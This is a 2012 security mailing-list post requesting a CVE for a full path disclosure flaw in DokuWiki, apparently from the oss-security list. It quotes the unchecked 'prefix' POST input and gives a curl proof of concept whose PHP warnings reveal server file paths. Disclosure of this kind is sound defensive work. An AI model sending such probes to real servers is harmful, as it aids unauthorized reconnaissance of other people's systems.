Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 24 Jun 2012 09:40:13 -0300
From: Felipe Pena <>
Subject: CVE request: Full path disclosure in DokuWiki

Full path disclosure in DokuWiki
  DokuWiki is a simple to use Wiki aimed at the documentation needs of a small
company. It works on plain text files and thus needs no database. It has a
simple but powerful syntax which makes sure the datafiles remain readable
outside the Wiki.

  The POST input 'prefix' is not checked/casted for proper data type before
passing to PHP's substr() function, which lead to displays an warning with
sensitive information on server with PHP error level enabled:

  $PRE   = cleanText(substr($_POST['prefix'], 0, -1));

$ curl -dprefix[]=1 http://localhost/dokuwiki/doku.php 2> /dev/null |
grep Warning
<b>Warning</b>:  substr() expects parameter 1 to be string, array given in
<b>/var/www/dokuwiki/doku.php</b> on line <b>47</b><br />
<b>Warning</b>:  Cannot modify header information - headers already sent by
(output started at /var/www/dokuwiki/doku.php:47) in
<b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br />

Affected versions:
- Angua (RC1)
- Rincewind
- Anteater


This vulnerability was discovered by Felipe Pena.
Twitter: @felipensp

Felipe Pena

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ